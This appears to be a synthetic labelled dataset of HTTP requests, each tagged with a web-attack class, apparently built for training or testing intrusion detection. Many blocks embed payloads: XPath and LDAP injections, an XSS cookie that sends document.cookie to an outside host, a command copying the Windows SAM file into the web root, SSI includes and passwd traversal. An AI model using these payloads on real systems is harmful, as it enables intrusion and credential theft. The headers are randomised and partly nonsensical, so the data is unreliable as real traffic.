Max-Forwards: 702
MIME-Version: 0.9
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: knwa2 hhrais7=2pEA
Range: -2,66-,4884-
Referer: /m5ea/htnm/hanatAo.mpeg
TE: chunked;q=0.1,gzip
Trailer: If-None-Match
User-Agent: awaqn/6.4.9
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: identity
Upgrade: ojr3e/2.9, tEafil/9.1, h5s/7.6
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 2420868137853987546
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36657
Start - Id: 48788
class: XPathInjection
GET /it4xavqI7pJ/iuNP2IN8e-Sp5KUD_FX/eAo23lfsmotx/97x/hhlvlcplern/dahetiitmitsweDue/mhewccot8tni/5o7ys5HaAl/aOrViGbYLbRpsEm.swf?eIxds1g=nfoirin%27+or+++++1%3C++eeebe%2Fdlsai%2F9pk6%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++or++%270u%27++++%3D+%27&e0=Aj&yRRtic6=S&slaselngunv=hss&se=netdivNchildm+uei%3Ftcnnw2&lwCywH50=%29&cemba2rc9n=i HTTP/1.0
Host: www.aeenh.ch:24
Connection: tmrtyPv7
Accept: video/*, video/mpeg;q=0.1, audio/basic;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.4, compress;q=0.1, compress;q=0.0, identity
Accept-Language: delei-eonfsl;q=0.5, eMnem-diuo6;q=0.2
Cache-Control: xmF='diira'
Client-ip: 49.61.235.194
Cookie: airovEi2bi=eoSK;ciIleii4=49821
Cookie2: $Version="33"
Date: Mon, 01 Oct 07 08:17:15 CET
ETag: W/"ss3oYqwA5LRwWDU"
Expect: 100-continue
From: iinongn@mnxs.it
If-Modified-Since: Sun, 23 Jul 06 07:48:35 UTC
If-Unmodified-Since: Sat, 17 Apr 10 19:06:40 CET
If-Match: "APQ6Ske@TeuPoC.3I"
If-None-Match: "Hv8i1IsSmdEyygPLvm"
If-Range: Mon, 08 Dec 08 03:03:19 GMT
Max-Forwards: 0
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: yeerry vuplo=4rasqRlo
Authorization: Basic dTBzcmJsc2I6dHdzYXRy
Range: -2670
Referer: http://no6oox.net/oc45/8arie4n/qEeres/ssEsrpid/1sir40.php3
TE: chunked
Trailer: If-Match
User-Agent: hfcdycro/6.5
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 5.2 4.9.63.250
Transfer-Encoding: compress
Upgrade: awtrEn/2.2, M8nHoh/0.5, rzw/3.0, gda/8.9
Warning: 080 www.ciitli.js "trbebkrzcma82" "Tue, 16 Jan 07 01:29:35 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 91085998772983
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48788
Start - Id: 37288
class: LdapInjection
PUT /locationRfXC/polaHoohey3ntiy/a0Z8VWW/KdruewSo/kiwhscriptz_/nYSLw9C4yB1A/tnetcat-GfcoIwUftpencr3/fM/oslgneamaorhsxst4.exe? HTTP/1.1
Content-Length: 146
Content-Language: h,sb
Content-Encoding: compress
Content-Location: /oIWEnma.jsp
Content-MD5: ZXRPMmFmZWhzcmdjcGFncw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Feb 09 21:19:03 CET
Host: www.skPeit.de
Connection: keep-alive
Accept: text/*, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: tYe-Cspdi3Ud;q=0.3, oh-fqsuc
Cache-Control: no-cache
Cookie: slg5nuods=iecAaaiHr;;M0zccahuraetcs=igac;igo=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="04"
Date: Mon, 21 Sep 09 17:46:19 UTC
ETag: "GqihKAZwpqxucDqw52"
From: UfphLeah@4nEt.uk
If-Modified-Since: Fri, 15 Feb 08 01:53:00 UTC
If-Unmodified-Since: Sat, 14 Oct 06 11:23:00 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Jun 05 11:11:42 CET
Max-Forwards: 5172
Pragma: no-cache
Proxy-Authorization: Digest username="txeEac"
Authorization: Digest algorithm=MD5-sess
Range: -789,-4,-955570
Referer: /nltDe/vaiU/eiedeI.tar
Trailer: Expect
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 4.9; tr-ve; rv:1.7.3) Gecko/13945038
UA-CPU: Sparc
UA-Pixels: 3751x161
Via: HTTP/7.2 16.212.1.32, 6.7 55.132.147.117, smo/4.0 www.miro.css:09
Transfer-Encoding: identity
Upgrade: hcbmpk/2.2, 6hrt/8.0, 9ynIoj/7.6, see/0.7, 8ere/1.7
X-Forwarded-For: 229.176.95.66
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FqrNqr=3362774674&emeulltehterhrh=n3edHn4latttrpgr&nmlTs5r8=u&cshiobOpD2raa=m6aewgtl5I&qoaa=e jatTNwnchr4S&ovreplaceaZ@=tzItS93AuUT&ySqnhhaeAb=be1

End - Id: 37288
Start - Id: 49927
class: XPathInjection
GET /siii3Hta6t/5dshlaostmod0nf0rven/ateisid5ud3Abigh/hNp4jrdD1SOSboYwumw/kIr6t2pmsrn4su/6AmcZPLIw89r/6DjVk8RHqsfaUyfzkoR6/7Aj/F7p@x9Z/buE_XVqQ.F@lG/wget4var00logofxEdJ.msf?zlIdgelbnggh=jUIcMdQrwur4&dw7gt6hmbpr61nu=o7%40Fi9zd&aolFo=edsar%27++++or+++++6+%3C+++count%28path%2Fchild%3A%3A*%29+++or++++%27atzt3ne%27+%3D++%27 HTTP/1.1
Host: 20.9.202.19:7795
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.149.110.120
Cookie: 2htreynulilyNt=t 2tmp;vnoodt0rw=ostSFtlF>execs4I;r5t9a7adi5ta1st=evalneDeu
Cookie2: $Version="5"
Date: Sun, 01 Jun 08 19:52:55 GMT
ETag: "-PkzT_C75R64usx5m"
Expect: 100-continue
From: anuul0@opadyrcN.cz
If-Modified-Since: Mon, 13 Nov 06 24:52:39 GMT
If-Unmodified-Since: Wed, 30 Jan 08 04:54:59 UTC
If-Match: *
If-None-Match: *
If-Range: "9NtuvThsKoOxD9B6dr9z"
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic bmJ2ZWFpcjpoZWk0cmhhVA==
Authorization: besh 2agae=u9pira
Range: -9495
Referer: /ar5t/ceattrn.gif
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.1 (compatible; nktth; Win 9x; emuoorerti; tolNeDaeaI; Oorotnrron)
UA-CPU: MIPS
UA-Disp: 3308,0110,8
UA-Pixels: 299x2707
Via: FTP/7.9 200.91.248.156, 1.2 www.Wietryu.png, 8.3 180.50.32.187
Transfer-Encoding: deflate
Upgrade: qfe/8.0
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 2013029504
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49927
Start - Id: 48824
class: XPathInjection
GET /iykle710dd/tGVXKyZ/mc/y3iipvMumoNFF4ZgS.shtml?Fxsems0irotor=713&lFhuRM=82&ai8alarrowmil=a&3GSvM1uoOj1=51307&eEubitirls=passwd+&Ss=dh8v%2Fo%2Fn8%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D50%5D++++or++++%27c1n%27%3D++++%27&gilaioloseh=i1etautoexecsst&iEs3oaethr1nee=ecyi HTTP/1.0
Host: www.mhsonEs1.net
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6
Accept-Language: uleedE9-IcT3hub;q=0.0
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: elzdbakei=096;YWlinkWuF8g.ws=dxtermvoasystemerTkea =o
Cookie2: $Version="352"
Date: Fri, 03 Mar 06 06:16:43 GMT
ETag: W/"HxRplA_cWdZdDiPv"
Expect: e7qaEu=rrl3lo
From: 18kll@eaes.it
If-Modified-Since: Wed, 01 Nov 06 21:58:03 GMT
If-Unmodified-Since: Mon, 23 Nov 09 08:01:33 GMT
If-Match: "W@NPrxNgBkspdMT"
If-None-Match: *
If-Range: *
Max-Forwards: 8789
MIME-Version: 7.6
Pragma: Aptq='dF'
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest qop=auth-int
Range: 5920-3
Referer: /i5et.msf
TE: chunked,trailers
Trailer: Referer
User-Agent: tVD25ICEA0 http://www.1gcn4rh.it
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 2.5 www.t3hros.css, 9.6 www.t3wapDt.htm, FTP/8.4 www.einrn0a.html
Transfer-Encoding: compress
Upgrade: ej6ash/0.0, c8tth/2.4, aem/9.4, atomei/2.3, cwtgw/0.9
Warning: 888 57.174.35.186 "l3aT4eMc1oeMeeesb" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48824
Start - Id: 35472
class: XPathInjection
GET /mudse/une/nny8t/yxshattuet/oJ_YDtnsJ/lvss7/d4o-orM@/sk6-/efoaH/0dV1PN4e.nsf?.1I5omorIpositionS8B=O5coe9u3dfs&Ncfpr=Eobinsunmahetctnl7&rhrn=1Te&3betweenbFI2lYpositionP=2030082&rirtot=apehus%7E HTTP/1.1
Host: 34.33.215.174:659
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 6310   or     1<   l5/zctV3/i5imnz/child::text()[position()=8]   or 47639='] | /* | /foo[bar='
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 59.239.90.47
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="6"
Date: Wed, 01 Jun 05 08:39:27 GMT
ETag: "dFInZO7AAV.iTnAMyce"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Fri, 26 Jun 09 06:45:48 CET
If-Unmodified-Since: Fri, 30 Oct 09 24:57:51 UTC
If-Match: *
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: "UqLtyWee9A0mveZ"
Max-Forwards: 853
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM QWFvak5hY2MwaHJ0ZHRlVHI4Z2xlYXRyeWVyOGZnbjZha2FpdWI=
Range: 527-,12-81
Referer: /nhgeh/tnert/skennaWe.txt
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: ulEiiwmedg (7aGh4g; gk4yGnRn; ar6ftlO)
UA-CPU: StrongARM
UA-Disp: 1801,706,8
UA-Color: color32
Via: 0.7 178.146.96.84, FTP/0.3 www.m4aef.js, FTP/4.9 www.eeTl.png:2
Transfer-Encoding: gzip
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 121.242.149.148

null

End - Id: 35472
Start - Id: 46200
class: PathTransversal
GET /uEuSgzo0tyvN/5fboot.iniUVw26_7gPTm/w_nN.BtWAy7/h6hstseon/aIijqv/asoe4mpjr/is0jh7ipeNksow.mspx?HtHshH0eMln=676&cEHux=vwHf_kJhefPq&steO=ee+varo&objectdocumentOd1KJ=rgehU&envrsemneU=0625&gsipei3mia=%2F%2C%2C%2C%2Fenrg%2Fewis%2Fpasswd&ygnaao23ay=cU2nDHsMu-k8&3hildtomr0ano=aOeL1ksj&aa6htiq4ryraae=tandebllechoHss&6llyh50tnerop=n26J.pFq&ZmBo.=lV8AFi2CQ&l3=n+e7m%3Cgaw%28tevse HTTP/1.1
Host: 65.81.120.238
Connection: stapsetd
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=295
Client-ip: 250.173.5.46
Cookie: mt=o-CCCjTzUG;sqorbe9nv=d(>unionboot.ini;bgaj=869486
Cookie2: $Version="43"
Date: Tue, 28 Apr 09 12:49:22 GMT
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: *
Max-Forwards: 07
MIME-Version: 0.2
Pragma: DgnE=rE5mNas
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest nonce
Range: 684-,-674552,060-
Referer: http://www.fnv1ui.be/neosxs/jnsg/tENgl/ntgs/bqrpeqf0.msf
TE: gzip,trailers
Trailer: Accept
User-Agent: nodj (huakGlx-On; nqCKD9WiKu; tnl9OU@)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: compress
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46200
Start - Id: 38741
class: LdapInjection
GET /h1Z_rEvmEEXPtPB/5d/rT/mtkIH6.x/a8MgS/r8phont0ews/so4isbno2nhEissaEz/tnceaeptdze2/x9a4ueo5aaiggpCa/pec2tqF/cslnqrdUsinsurle/t@sybUG2H-Vr4.tiff?bEpeA=eiosln&5otposne=%29++%28++%7C++%28displayName%3Dhad*%29+++%28name%3Dhad*+++%29%28+mail%3Dhad*++++%29&EK3X2h00wU=s+e2&seam=abED1ma0VUe6&QY-RM7lnX=0&tahneePrA6hcTi=1KYN7--Z&hb1astLdoT=e6uaEAcRnunNnte&mcte=oto8t&re=iframeIo1%25&tYoaexkntnboe5T=exfeweeun&aeorF8=6&aG=ncsbetweenercd5bjtsd%3Al HTTP/1.0
Host: www.adhabctqf.com:80
Connection: a3ivnet
Accept: application/rtf;q=0.7, image/jpeg;q=0.3, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=557
Client-ip: 62.92.248.134
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="7"
Date: Sat, 03 May 08 20:37:55 CET
ETag: W/"e8ISoAtba4-kVYA"
Expect: Eirzruo
From: Dddcd@u4uew8d4.be
If-Modified-Since: Mon, 20 Sep 04 24:47:52 UTC
If-Unmodified-Since: Sat, 29 Nov 08 18:08:10 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Sep 08 02:47:53 GMT
Max-Forwards: 8609
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Digest qop=auth
Range: 6-630560,55-36780
Referer: http://kizlrsai.uk/Lecz/ksu3i6.aspx
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 2.4; di-rs; rv:9.0.3) Gecko/31158127
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 708x0432
Via: FTP/9.8 www.cntw.js
Transfer-Encoding: diAUz; vhlate=t5Eee
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38741
Start - Id: 46673
class: XSS
GET /93BpkRc1EQWAo/eauo_.jsp?hai=927&toeontdttndm7=y6sjsendait&kn=330289&9yr1sipH=T&gniTe=sn6X_J&tv6epnt6ih38hr=0757795741 HTTP/1.0
Host: www.atril.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 125.79.134.83
Cookie: oElhhlR2od2=<img    src=&{[document.location.replace    ('http://www.titian.com/cgi-bin/el.cgi'+document.cookie);]};   >
Cookie2: $Version="2"
Date: Fri, 11 Jan 08 20:55:13 GMT
ETag: "z00nWBOLiGkYI9Z.ifA"
Expect: sb80e=Eopiu;mfdtzm=tMace2eH
From: Dped3ih@fknm2tsceo.gov
If-Modified-Since: Sun, 07 Mar 10 09:14:18 CET
If-Unmodified-Since: Thu, 28 Jun 07 21:59:32 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Sep 07 14:16:00 CET
Max-Forwards: 205
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic empucm5lZXM6cmZldQ==
Authorization: Basic M29vaWFvaW46NzNkZWtO
Range: 1-744161,4-8,7763-187
Referer: /hapsew/hnirtt4/r0itlt.doc
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: 3lN6IHW http://www.no2n.st
UA-CPU: x86
UA-Disp: 598,1386,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: aeE/5.8 www.edai.jpg
Transfer-Encoding: identity
Upgrade: ms8pnA/8.6, 2r5c/1.7, a6d/6.2, Hgagks/0.3, dwe/0.6
Warning: 543 www.drfN.jpeg:58573 "nsHO" 
X-Forwarded-For: 249.226.25.170
X-Serial-Number: 19077842196498
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46673
Start - Id: 48879
class: XPathInjection
GET /ifsasS6ii/iXkFXeu/z8NGdropgW6Y/iqqovQ9EIERZ/irjf/c7/d7xIPyKHbQZ2IQwa-ma/ouY0sgBKmnWZty.BX/0GBOqGzugn6eBtY6/tGIL3cUJ-Imv.MH/stthxftawsrzhsoe7tOE.msf?ewi=ywatehh&sqVuPyKIXA=dCx%40GkTTWMA&tempw1u=enmioOeuaN&vnmtrredmhoeiu=eysna&pQhBDm=Ef&tefn1fepuuodgEr=stIn66tmse&syhes7alair=4&qKkQFkstdinQklocationiG=i0ni3ei%27++++or++%28i+%3C+++++count%28stapi%2Fchild%3A%3Atext%28%29%29+++++and++j+++++%3C+++++count%28nzeiyp%2Fchild%3A%3Acomment%28%29%29++++and+++k+%3C++++count%28bteedw%2Fchild%3A%3A*%29++%29+++++or++%272m%27++%3D++++%27+++vmhe%27+++++or&ioNsentRsre=oIrtGi2DopUaavgi&e3g4saxnq=1hco&yner2=39028201&rataCpsico=j9r0Erfbbi HTTP/1.0
Host: 62.52.220.29:708
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=19
Client-ip: 220.116.206.243
Cookie: bgsoundFErftpetcdocumentD=4382346007
Cookie2: $Version="4"
Date: Fri, 03 Aug 07 22:10:54 CET
ETag: W/"avkdAM5fKHi_g6mgBO"
Expect: 100-continue
From: SeqnAyso@nknWroo.ch
If-Modified-Since: Tue, 12 Sep 06 03:58:56 CET
If-Unmodified-Since: Sun, 11 Oct 09 22:42:21 UTC
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 1
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: NTLM NWE5aXNpdDV3c2lma2k4bGFQZTcwYUtzZXJlZWtlZWFhYzNu
Range: 41-,-69
Referer: http://www.8ddf.ch/inowotf/ksi9eM/gssd/rstodE/o0lael.txt
TE: gzip,trailers,deflate
Trailer: Accept-Charset
User-Agent: 3eO9R1qj http://www.SaX9.cz
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 97.121.81.243, cued/7.1 www.febo.tiff
Transfer-Encoding: dvsA
Upgrade: sot/2.1, durd/1.9, 3esnsy/4.2, ocnwu/9.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48879
Start - Id: 42870
class: OsCommanding
GET /s3z7stRswme0OGq/cTi_Bfu@/ot2ezeelteXei8ryR/idot/ssthlsRtes5sfi/6lnlQled/a9iQKydNyxrXAdX/e0MyXIf4zV0yREhrYk/TtwOkLLoiniSLhd/@t8OXFJZKi6like/jIvHjbgsoundPIR4-k/SdehtgeeuH.png?eecPirhV=4855432905&anarcjlaFuEnn1e=sonaE18Tmhwreihra&af=gey&snoFinswW=244.37.67.91+%7C+copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&IDNB=69478 HTTP/1.1
Host: www.tNHhint.it
Connection: keep-alive
Accept: text/plain, image/gif;q=0.7, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: hr-frgyin, dn7h-hlcmtf;q=0.6
Cache-Control: no-cache
Client-ip: 254.89.206.17
Cookie: sftt=ene
Cookie2: $Version="05"
Date: Tue, 20 Sep 05 21:11:54 UTC
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: rltnk@9tih3Enaa.uk
If-Modified-Since: Sun, 28 May 06 16:20:24 CET
If-Unmodified-Since: Wed, 09 Nov 05 20:00:48 UTC
If-Match: *
If-None-Match: *
If-Range: "vHcouMZL-Le3yQRa"
Max-Forwards: 11
MIME-Version: 9.7
Pragma: Rsui=ehiSotr
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: NTLM bHNtaVNzYnRuY2NvdDI3NXJkYWFmbnREZWF5ZWhmN2loZTFhaWk=
Range: 8533-,2458-
Referer: /7ps3agee/ooyo899.mpg
TE: trailers,gzip;q=0.5
Trailer: Via
User-Agent: rehapcnu (taAixc.f; d44yJM97U2; n20BXzqql)
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.8 3.36.6.54, HTTP/5.7 159.70.36.254
Transfer-Encoding: deflate
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 323 162.27.151.212 "63fpil54l" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42870
Start - Id: 48408
class: XPathInjection
GET /pfVM7@mz_EyBG/0pd/rEjln_YPNVv31V6tCQ/eyeRnmrid/CuFG.gq.97divv/MwinntSQFBj2jJl0tmpLe/tr92EE/6YiZZHH3xSsRcHuA92m/uz/dpwaioe.png? HTTP/1.1
Host: www.emttrhhg5p.it:260
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=929
Client-ip: 170.252.28.154
Cookie: rshp=tnuuad2ertsmonbnt;ZwHY5rqqwindow.opena=ujaia'   or   (i     <    count(aneix/child::text())  and    j < count(6mltjl/child::comment()) and k    <   count(ohRO/child::*)    ) or   'cOTe9'=   ' yqrtd' or;dtC3irrogorR=541665;xpdnrena=5;MSsrte=ufromohu;eeevaluS)perl
Cookie2: $Version="012"
Date: Sun, 29 Nov 09 23:29:12 CET
ETag: W/"aT8fjyrADnQECDUvu5U"
Expect: bregeio
From: hixtt@Gja77.uk
If-Modified-Since: Mon, 20 Jul 09 15:15:35 UTC
If-Unmodified-Since: Tue, 15 Apr 08 23:36:52 UTC
If-Match: "zJSY7Qf9H@7QDyq"
If-None-Match: *
If-Range: Fri, 17 Aug 07 10:46:23 CET
Max-Forwards: 51
MIME-Version: 6.4
Pragma: ngln=iil
Proxy-Authorization: Basic ZWl1T246c0k0aGxzYg==
Authorization: NTLM dTZya3M0amZVck5VWGl4YTFuZm1oZWN5emw2dmFoc3RlbXRPZ3NlcndSbzFuZQ==
Range: 421549-,-340,-90
Referer: /oOep/Shctt9n/seSntent/rI9ha/wwtnbe7c.jsp
TE: trailers
Trailer: Connection
User-Agent: Mozilla/3.3 (X11; U; Solaris 5.9; hh-wr; rv:8.6.7) Gecko/16223310
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2595x585
Via: 7.6 www.5ssoma.png:1141
Transfer-Encoding: deflate
Upgrade: sauns/2.9, gHio/7.2
Warning: 613 94.144.29.207 "amddibhttlecssaf" 
X-Forwarded-For: 124.106.76.10
X-Serial-Number: 7032962389
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48408
Start - Id: 40383
class: SSI
GET /0ESAhh9c9xHU7mbSpYl/ey3DZw@-vMzFkvep_W/TDYD4bxXchild/elAKZbgYp1in3@1q/6dtqinsertT902binoZ/hieyaml4iwnosehi/%ufiTx8accept/fBFWJ@0OA0hSYt@.exe?ia=ehQbwj&nt=%27rh HTTP/1.1
Host: www.fqrci9enai.com
Connection: ueu4sAl
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=59
Client-ip: 45.2.5.4
Cookie: deohSoeektee=6455271;sF3aa2=<!--     #include   virtual="c:\winnt\system.ini"     -->;aTzr0GVR=9;nbftow02arinr=(=ilw
Date: Thu, 12 Nov 09 08:24:55 UTC
ETag: "AGX_RqIVSijO7Bxx"
Expect: nibmalar
From: yhnh@ciraoo.net
If-Modified-Since: Sat, 19 Nov 05 20:47:36 UTC
If-Match: "tIz8b_7EARGieHfzwuoy"
If-None-Match: "cM_nDseWu40iwCgq0"
Max-Forwards: 5
Pragma: no-cache
Authorization: NTLM ZnN0SXlyYWlpMnRpaWUxZGllaGdpanZ1bGNkdG1PTzUxbGVuZWViM0l0aWNlZg==
Referer: /yetda/2edoh/hmmay/NcTuyPE/8xivn1n.dll
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 0.4; S2-ai; rv:2.8.1) Gecko/34739129
Via: HTTP/7.5 www.onaIr.htm
Upgrade: oot/9.6
X-Serial-Number: 67175065778881271
----: --------------------------------

null

End - Id: 40383
Start - Id: 37210
class: LdapInjection
GET /eiPein/icqp0d7einsghnfe8/eQfdpDwa899irbqzrGo/nxiftbhenneajoe9gdnu/uh/ru5etsSceiBwtaQso0/LoDjsE/m4QRPmvskTjN.mdb?0tthGdnvsPalat=%29+++%28%7C++%28+++cn%3D*o%27brien*+%29%28mail%3D*o+%27brien*++%29+++&DPkJ=Tnan&ptslLnybne9nrb=701716&nai=mdey5+sds&hitEh=606&nale6xaonn=oV4%27qSh3r%3Frn+linkjrelsa&JRhtaccesi@N5zexecdeleteJB=3475911 HTTP/1.1
Host: www.Snceb.org:250
Connection: keep-alive
Accept: application/*;q=0.4, text/*;q=0.2, image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: D9sen3U-oepEt;q=0.0
Cache-Control: max-age=96735
Client-ip: 98.210.207.217
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Thu, 11 May 06 16:59:32 GMT
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Wed, 30 May 07 10:15:02 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Jun 08 10:35:19 GMT
Max-Forwards: 399
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: Basic ZWxiNTpydDMw
Range: 605-286224
Referer: /ofit/mNvteI/etTeqh/asg8/Oeltd.asp
TE: deflate,gzip,chunked;q=0.9
Trailer: Max-Forwards
User-Agent: nhkEdnoilnesi5oi
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: HTTP/9.0 123.213.232.65
Transfer-Encoding: ntwcr; alher7=urwa8
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 835 30.241.51.47 "4eor3o4bh0icK" 
X-Forwarded-For: 209.47.70.154
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37210
Start - Id: 44955
class: PathTransversal
GET /servicesa/4iIMuYqoBwG2NrN-h/lCrv/PQ3cby.QO_/rumaAolehrwylizswe/l.DVSSSaSx2C_7jcwb/tGrUX0aAiX/bodyLRvUk/tr1UUJGplVa/ZVX1Fj74e.html?e5bomocn4a=TEp&yPsystemwpx=3s9aunwei7o&sga=-&JqSV=doc%28file%3A%2F%2F%2Fc%3A%2Fhewh%2Fsgcq.xml+++++%29&e7to=rCA&tacG=0iq&iCdolium=ocx%29o&2t9gIhhnre=4&oaus=190002 HTTP/1.1
Host: www.dc5t3.it
Connection: keep-alive
Accept: image/*;q=0.0, image/*
Accept-Charset: windows-1253;q=0.5, iso-2022-jp
Accept-Encoding: gzip
